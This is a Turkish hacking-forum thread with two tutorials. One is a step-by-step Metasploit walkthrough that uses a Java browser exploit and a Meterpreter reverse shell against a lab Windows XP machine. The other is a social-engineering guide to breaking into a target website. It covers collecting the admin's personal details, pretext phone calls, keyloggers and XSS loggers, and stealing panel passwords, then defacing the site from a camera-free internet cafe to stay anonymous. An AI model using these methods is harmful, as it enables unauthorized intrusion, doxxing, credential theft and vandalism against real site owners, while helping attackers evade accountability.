Hedef Sisteme Sızma

0xLegendary

Uzman üye
14 Tem 2013
1,402
0
Merhaba arkadaşlar
Met-asploit framework yani msf 2003 yılında geliştirilmeye başlanmış içinde sistemler hakkında bilgi sahibi olmamızı,sistemlere sızmamızı sağlayan modüller bulunan bir pentest aracıdır.Kullanışlı bir araçtır.
Windows altında kullanılabildiği gibi Linuxtede kullanılabilir.
Benim önerim sanal bilgisayara linux(backtrack veya kali) kurup bu aracı orda kullanmanız yönünde olacaktır.Yavaş yavaş bu konuda bilgi vermeye başlıcam.İçinde bazı modüller var ilk bu modüllerden ve mantığı kavramamıza yardımcı olacak terimlerden bahsedeyim.

Vulnerabilty:Sistemlerde bulunan açıklardır.

Exploit:Sistemdeki açıkları sömüren kod parçacıkları diğer bir değişle açığı suistimal eden yapılardır.


Auxiliary:Hedef sistem hakkında bilgi sahibi olmamızı sağlayan araçlardır.Bu araçların içinde exploitlerde yer alabilmektedir.Exploit kategorisinde yer alan araçlar sisteme uygulandıktan sonra payload çalışmasını sağlarken burdakiler hedef sistemde bilgi toplamak,test yapmak amaçlıdır.Örnek vercek olursak sisteme açıktan bağlanıp şifre denemesi yapan bir exploit bu kategoride yer almaktadır.


Payload:Sistemin exploit edilmesinden sonra sisteme saldıran kişi ile sistem arasında bağlantı kuran,kod çalıştırmasına olanak sağlayan yapılardır.
Payload bölümünde 2 önemli konuya deyinmek istiyorum.İlerde sık sık kullancağınız 2 payload türü olan bind bağlantı ve reverse bağlantı.
Bind Bağlantı hedef sistemin açık portu dinlemeye alıp saldırgan ile iletişim kurmasıdır.

Reverse Bağlantı yani ters bağlantı ise hedef sistemin, bizim(saldırganın) kendi açtığı ve dinlediği porta bağlantı sağlamasıdır.

Saldırdığımız sistemin uzak bir sunucu olduğunu varsayarsak sistemde port açma gibi bir lüksümüz yoksa(çoğu zamanda olmaz) reverse bağlantıyı tercih ederiz.Ama sisteme netcat enjekte edip uygun koşulları sağladığımız takdirde bind bağlantıda yapabiliriz.

Bir diğer önemli konu ise hergün met-asploit framework'ünüzü güncelleyin.Elinizden geldiğince güncel tutmaya çalışın.

Sisteminiz hakkında bilgi edinebilmek ve açıkları tespit edebilmek amacıyla Nessus Adlı Programı Kullanabilirsiniz.
Nessus Kullanımı İçin Tıkla




########################################################
Hazırlayan:xMaterdom

Konu:Java Program Exploit Yoluyla Hedef Bilgisayara meterpreter ile sızma
Kullanılan Exploit:exploit/multi/browser/java_jre17_jmxbean_2

Payload:java/meterpreter/reverse_tcp
########################################################


Merhaba arkadaşlar.Başlamadan önce şunu belirteyim bu exploit 2013 yılında şubat ayında tespit edilmiştir.Eğer ****sploitiniz güncel değilse bu exploiti bulamayabilirsiniz.Bu yüzden ****sploitinizi güncellemenizi öneririm.


1oa2.png

Resimde görüldüğü gibi terminalimizi açtıktan sonra msfconsole yazarak ****sploit framework konsola erişelim.


ni48.png

****sploit framework'u açtığımıza göre artık başlayabiliriz.İlk iş olarak exploitimizi arayalım.****sploitte arama işlemi için search deyimi kullanılır.Bundan sonraya arama kriterleri ve arancaklar yazılır.Resimdeki gibi arama komutumuzu veriyoruz.Enter tuşuna bastığımızda exploitleri görüldüğü üzere listeledi.Resimde seçilmiş olan exploiti kullanacağız.



w8zx.png

****sploitte herhangi bir şeyi kullanmak için use deyimi kullanılır.
use exploit/multi/browser/java_jre17_jmxbean_2 şeklinde seçtiğimiz exploitimizi kullanıma alıyoruz.



g0r6.png

exploitimizi seçtikten sonra bunun hakkında bilgi edinmek istersek info deyimini kullanırız.
Resimdeki gibi info yazıyoruz.Entere bastığımızda exploit hakkında bilgiler listelenmiş olacaktır.
Burda exploitin adı,modül'ü,Rank'ı(derece),etki edebileceği platform ve hedefleri,açıklaması ve ayarları görülmektedir.Bütün bilgilere erişebilmek için biraz daha aşağı inelim.



yrdp.png

Biraz aşağı inince Description kısmında exploit ile ilgili açıklamayı görebilirsiniz.Resimdeki seçilmiş yazıya dikkat edin.Java 7 Update 10'a etki ettiği yazıyor.Dolayısıyla bu exploit Java 6 yüklü bir hedefte çalışmayacaktır.Herhangi bir exploit hakkında bu şekilde detaylı bir bilgi edinmeden o exploiti kullanmamanızı öneririm.Resmi incelediğimizde Required kısmı yes ve no olan ayarlar mevcut.Burdaki required kısmı yes olan ayarlar boş olarak geçilmez.Örneğin URIPATH ayarının required kısmı no.Yani doldurmasakta olur ancak yanındaki açıklamaya baktığımızda eğer bu kısım boş olarak geçilirse rastgele(random) olarak doldurulacağı yazıyor.



kfqx.png

Yukardaki info resminde srvport kısmını görebiliyoruz.Burdaki değer 8080 yani exploiti çalıştırcağımızda 8080 portu üzerinden bağlantı geldiğinde payload'ımız aktifleşcek.(bu kısmı anlamamış olabilirsiniz.İlerde anlayacaksınız.)
Herhangi bir özelliğe değer atamak için set deyimi kullanılır.
set srvport 80 ile srvport'a 80 değerini atıyoruz.




http://imageshack.com/a/img841/872/utv4.png
Yukarda URIPATH kısmını doldurmazsak rastgele değer atancağını söylemiştik.
set uripath / ile uripath'e / değerini atıyoruz.(uripath lhost ıp'sinin üzerine eklenen adrestir.İlerde daha rahat anlıcaksınız.)


z1xk.png

Sisteme exploiti uyguladıktan sonra sistem ile aramızdaki bağı payloadlar sayesine kurarız.Dolayısıyla exploiti çalıştırmadan önce payload seçmeliyiz.Exploitimize uygun payload'ları listelemek için show payloads deyimini kullanırız.Resimde bu exploitle kullanılabilecek payloadları görüyorsunuz.Seçili olan payload'ı kullanacağız.



zcec.png

set payload java/meterpreter/reverse_tcp komutuyla payload olarak java/meterpreter/reverse_tcp belirliyoruz.(neden reverse derseniz konunun ilk başında bağlantılarla ilgili açıklama mevcut)



6w5c.png

Payloadımızı seçtik ancak belli ayarlamalar yapmalıyız.Ayarları görmek için show options deyimi kullanılır.Resimde ayarları görüyorsunuz.Payload options kısmında LHOST değeri mevcut ve bunun herhangi bir değeri yok.Bu kısma kendi ip adresimizi atayacağız.



hq3y.png

Terminale ifconfig(windowsta ipconfig) komutunu vererek seçili ip adresini öğrenelim.Daha sonra bu ip adresini kopyalayalım.



kea9.png

set lhost 192.168.142.133 deyimi ile lhost'a 192.168.142.133 değerini atadık.


k7m0.png

show options ile ayarlarımıza tekrar baktığımızda yukardaki gibi değerin atandığını görebilirsiniz.


rv1a.png

exploit deyimi ile exploit hazır hale getirilir.Yukardaki gibi exploitimizi hazırladık ve çalıştırdık.Şimdi bazı yerlerde anlamadığınız noktalar olabilir ilerde anlıcaksınız demiştim.Burda onları açıklayalım.
4444 numaralı ip adresini dinlemeye aldık(msf kendi aldı bazı exploitlerde almaz siz kendiniz dinlemeye alırsınız.)Local IP kısmının karşısında yer alan değer yani;
http://192.168.142.133:80/ adresine aynı ağımızda bulunan kullanıcıyı yönlendirdiğimizde payloadımız üzerinden bağlantıları alacağız.Yukarda tanımlanan lhost değeri bunun içindi.srvport değeri ise url üzerinden bağlanılcak port.(http default 80dir zaten)
Local olarak bu işlemi uyguladığımızdan srvhost değerini değiştirmedik.
80'in sonunda yer alan / ise bizim uripath değerimiz eğer uripath'e deneme deseydik şu şekil bir çıktı olacaktı.
http://192.168.142.133:80/deneme



Artık yapmamız gereken kullanıcıyı bu adrese yönlendirmek ve meterpreter(payloadımız) aracılığıyla bağlantıyı sağlamak.



ba8m.png

windows xp sp3 bilgisayarımdan exploit url'ye bağlanıyorum.


vl3g.png

Bağlantı sağlandığında hedef bilgisayara yani windows xp sp3 bilgisayarıma meterpreter ile sızmış bulunuyorum.(Resimdeki gibi)
Meterpreter oturumu başlattı.Artık bu oturumu kullanabiliriz.



d45v.png

Aktif oturumları listelemek için sessions -l deyimi kullanılır.Resimdeki gibi oturumları listeliyoruz.



gkt3.png

sessions -i 1 ile 1. oturuma geçiş yapıyorum.Artık meterpreter hazır istediğim komutu çalıştırabilirim.sysinfo ile sistem bilgisini alıyoruz.Resimde görüldüğü gibi hedef sisteme yani windows xp sp3 bilgisayara sızmış bulunmaktayız.


Diğer örneklerde backdoor oluşturma,sniffing,firewall atlatma gibi konulara değineceğim inşallah takipte kalın.Hoşçakalın.

xMaterdom Tarafından Güvenlik Amacıyla Yazılmıştır.(Dökümanlar Eğitim Amaçlıdır)

Makalenin Devamı Alt Tarafta Yer Almaktadır.







Selamun Aleyküm ;
Konuda Sadece Hedef Sisteme Sızma ile ilgili sadece yöntem ve tavsiye vermeyeceğim yanlış gitmekte olan işleyişlerde uyarılarda bulunup nasıl çözüme kavuşturacağız nasıl birşeyler üreteceğiz hep beraber düşünerek tartışacağız.Biraz uzun olabilir yazım lütfen baştan sona kadar okuyup kişisel görüşünüzü belirtin.Emin olun bu makalemi okuduğunuza pişman olmayacaksınız.

Sosyal Mühendislik Yöntemine Geçmeden Önce :

Evet arkadaşlar Sosyal Mühendislik Yöntemi bizim en son kullanacağımız yöntem olmalı.Bu yüzden buna geçmeden önce neler yapabiliriz belirtelim.
Bir hedef sistemimiz var diye kabul edelim. Sitemizde www.HedefSite.com olsun.Bu sitede ilk öncelikle yapacağımız işlemleri kısaca belirteyim ;
* Site hangi dilde kodlandıysa ona göre açıklarına bakıp bug taraması yaparım ( php ise rfi ,sql ise sql gibi xss gibi...)
* Sitede bir bug yoksa Reverse IP Lookup and Domain Check DNS Tool bunun gibi sitelerden serverdaki diğer siteleri görme imkanını sağlarız ve serverdaki diğer sistemlere sızmaya çalışıp oradan hedef sistemimize sıçrama yaparız.
* Bu manuel aramalar sonucunda ele alınır bir sonuç çıkartamazsam programlarla server taraması ve Network taraması yaparım.Önereceğim programlar ;
Shadow Security Scanner(SSS), Acunetix Web Vulnerability Scanner (AWVS) ,GFI LANguard Network Security Scanner,Advanced LAN Scanner ,Advanced Port Scanner,Falcove Web Vulnerability Scanner....

Bunları ayrıntısız olarak anlattım çünkü burada anlatmak isteeceğim kısım SM ile ilgili olanıdır.Bu ve bunun gibi yöntemler sonucunda yine bir gelişme olmayıp hedef sisteme sızamadıysak iş SM ye kalacaktır.
THE_MILLER
SosyaL MühendisLiğe Giriş ;

Sosyal mühendislik ne dersek kesin bir tanımını yapmakta zorlanırım fakat kısaca bir ikna yöntemi diyebilirim.
Az öncede belirttim SM kullanacağımız en son yöntem son çare olmalıdır.Neden dersek bu yöntem uygulayan yani bizim için sakıncalı olabilir hem de Yaptığımız hacking işinin Uslubuna aykırı olur.
Neden aykırı olur bunada geçelim.SosyaL Mühendislik artık okadar basit gibi gözüküyorki herkes ben SM ciyim demekte.SM nin yalan söyleyip dostluk kazanıp kişiye trojen yedirmenin olduğunu sanıyorlar.Aslında asıl hata bizde SM nin tanımını onlara tam olarak anlatamamızdadır.Genelde bir kız msni açıp split camda kız videosu koyup kişi erkekse yakınsal bir tavır sergileyip bunun sonucundada ona bak benim resimlerim bakabilirsin gibi bir yöntem sergilemek sizin SM yöntemlerini kullandığınızı göstermez.SM nin bir veri toplama bu verilere göre fikir üretme aşaması bu fikri uygulamadan önce materyallerin hazırlanma aşaması ve bu senaryoyu uygulamadaki başarısız sonuç karşısında farklı alternatifler üretip halen sonuca gitme aşamaları vardır.Sadece aşamada değildir.SM bir ikna kabileyitidir.Bazılarımızda doğuştan gelen bir yetenek olarak görülebilir.Reel hayatında yaptığı ikna edici konuşmalarıyla vs.Bu herkesde olmayabilir bir çok kişisel gelişim kitapları, kişilerle iletişim , tiyatro gibi etkinliklerle bu geliştirilebilir.

Ben SosyaL Mühendis Değilim ! Ama ........ ? !

Evet Ben Bir Sosyal Mühendis Değilim.İkna kabiliyetim yeterli üst düzey değil.SM adına herşeyi takip etmem.Özel Dersini almadım.Ama Yeri gelince SM yi bu işlerde kullanırım.Sosyal Mühendis değilim Ama sosyaL Mühendisliği Hedef sistem için kullanırım.İkisi çok farklı birşey zaten benim için kullanmak yeterlidir.Peki nasıl kullanırız Web Hacking Yöntemleri ile SM yöntemlerini birleştirerek.İşte ben bunu çok güzel uyguluyorum.bunun içinde Sadece SM bölümünde takılmamızla olmuyor.Web Hacking adında bir birikimimiz olması gereklidir.

Hedef Sistem ve Sistemle İlişkili Kullanıcıların Analizi :

Sm de yapılacak ilk iş analizdir. eX-FaCToRun bugun söylediği bir sözü takıldı aklıma "bu sırtında paraşüt çantasıyla uçaktan atlamak gibi birşey ama paraşütü açmak için çekim ipin yoksa paraşütün olması pek etki etmiyor" Bunu Analiz Yani veri toplamazsak bizim yapacağımız işlevin sonucunda bu olabilir.
Şimdi Ne Tür Veriler Bilgiler gerekli onları belirteyim

1) Hedef Sitenin Admini ( Sahibi ) Hakkında isim,soyad,yaş,msn adresi,ev adresi,Telefon numarası
2) Hosting firmasının iletişim adresi,Telefon nosu,fax,bağlantıları vs
3) Domain bilgileri ( bazen hosting firmasından farklı olabiliyor o yüzden onada bakmak lazım)

Bunların bazılarına whois çekerek ulaşabilmekteyiz.
Esas özellik bunlar ama bunlarla bitmiyor.Hedef kişinin özel bilgileri ,arkadaşları vs sitesinde yönetici varsa onlar hakkındada bilgiler vs.Yani hedef sistemle kimlerin bağlantısı varsa onların hakkında ne kadar bilgi ele geçirebiliyorsak nelere merakı olduğunu,nelere uzak olduğunu ,nelerle uğraştığını ,herşeyini araştırıp rapor etmek bu verileri saklamak gereklidir.Veri araştırması her daim olmalıdır.Diğer aşamalara geçilsede veri eklenerek senaryo duruma göre değiştirilmelidir.

Senaryo Üretimi :

Senaryo üretimi bundan önceki kısım olan veri toplamaya bağlı olarak yapılacak ayrıca Bundan sonraki Materyal hazırlama bölümüylede alakalı olmalıdır.Çünkü elimizde neler var neler kullanabiliriz neler yapabiliriz onları bilmemiz lazım.Senaryo kısmında çok dikkatli ve titiz davranmalıyız çünkü saldırıyı buna göre yön vereceğiz.Hedef kişi nelerden hoşlanıyor nelerden hoşlanmıyor buna göre üretilmelidir.En önemlisi nasıl dikaktini çekeriz bu önemli.Bazen msnini ekleyerek oradan birşeyler elde edilir.Bazen mail yoluyla ama sonuçta bir işlem yapacaksak yazım kuralları dahil herşeyde titiz olmalıyız.Bazense telefon görüşmeleriyle olur.En çok önerdiğim yöntem budur.Kişinin konuşma tipini nasıl bir karakter olduğunu öğrenmenin en mantıklı yoludur.Gidersiniz bir telefon kulubesine ararsınız ya yanlış numara oldu pardon dersiniz.Ya da ben şu firmanın yetkilisiyim vs ile başlarsınız oradan ileitşim maili ve diğer bilgileri kolayca öğrenebilirsiniz.Reel SM her zaman en mantıklısıdır.Neyse ya da bunun gibi bir senaryolar hazırlayıp gerekli materyaller bölümüne geçebiliriz.

Materyalleri Hazırlama :

Evet Diğer aşamalar bitti buna göre bir materyal hazırlamamız gerekecek.Xss ilemi deneyeceğiz ozaman sniffer,Html Logger mi gideceğiz.Kişinin ne tür tarayıcı ve işletim sistemi kullandığına göre bunu ayarlıyacağız.Keyloggermı yedireceğiz ozaman gerekli server tanımsızlaştırma işlevini yapmalıyız.Ya da başka türden akıl oyunlarımı deneyeceğiz clicjacking ya da servera sh3L attırma gibimi ne varsa hazırlayacağız.Bunun içinde son gelişmeleri takip etmeliyiz durmadan yeni yöntemler çıkıp kaybolabiliyor.Mesela bir sitenin yönlendirmesi çıkıp kısa sürede fixleniyor ya da html logger tanınmazken tanınabiliyor gibi.Bu yüzden hazırlayıp senaryoyu sunmadan önce bunları test edip denememiz gerekli.

Senaryo Uygulandıktan Sonraki Durum :

Büyük bir titizlik ve gizlilikle senaryomuzu uyguladık eğer olumlu sonuç aldıysak şimdi reg maili ele geçirmeye geldi.Sonuçta bu adresin şifresi geldiyse hosting firmasına belirterek yönlendiririz.Yada ftp passları varsa direkt index atarız helede plesk panel şifreleri geldiyse Allah deriz :)
Yani bundan sonraki işlem Siteyi deface etmek fakat kimliğimizi gizli tutmak.güvenlik camerası olmayan internet cafeden kısa süre içerisinde bu işlemi bitirmeliyiz.

Sonuç :

Bir çok konuya değindik.Hedef Sisteme Sızma Yöntemlerini Ağırlıklı olarak SM ile olanı verdik.Gizlilik ve titizliliğin önemini vurguladık.Durumlar karşısında ne tür yollar izleyeceğimizi belirttik.Artık gerisi sizin yaratıcılığınıza kalmış birşey.Birdaha belirtiyorum SM en son kullanılacak yöntemdir.SM işi hafife alınacak bir çocuk oyuncağı değildir.Kişisel gelişiminiz bu yoldaki gelişimlerinizi sağlayacaktır.Hacking Timlerinde Aktif olursanız bu konuda dahada uzman olabilirsiniz.SM seminerleri verilirse mutlaka katılın.

Görüşleriniz ,fikriniz,eksik ya da yanlış belirttiğim bölüm varsa lütfen belirtiniz.Bu makalem min 2-2,5 saatimi aldı sanırım.Umarım faydalı olmuştur.​
 
Moderatör tarafında düzenlendi:
25 May 2014
112
0
pwd
Bende Güncel // deyim görmeyenler görsün :)
Eline Sağlık
Benimde Hep Merak Ediyordum Ya Adamın IP numarasını bulduk.Sonra NMAP ile açık portunu bulduk ya sonra :confused: artık M e t a s p l o i t ' i de öğrendik :)
 

0xLegendary

Uzman üye
14 Tem 2013
1,402
0
Bende Güncel // deyim görmeyenler görsün :)
Eline Sağlık
Benimde Hep Merak Ediyordum Ya Adamın IP numarasını bulduk.Sonra NMAP ile açık portunu bulduk ya sonra :confused: artık M e t a s p l o i t ' i de öğrendik :)

Sağolasın met-asploit bu kadarla sınırlı değildir.0'dan met-asploit eğitimi hazırlamayı düşünüyorum ilerleyen zamanlarda.
 

kadiir

Üye
18 Şub 2007
248
0
istanbul
dostum ellerıne saglık yalnız bu sistem windowsda calısıyormu vede hedef kısının bızde ıp port olması yeterlımı?
 
22 Mar 2015
156
0
Kardeşim ellerine sağlık üşenmeden yazmışsın ama bunun yerine bir video çekeseydin bence daha anlaşılır olurdu hacker lığa yeni geçiş yapanlar için
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.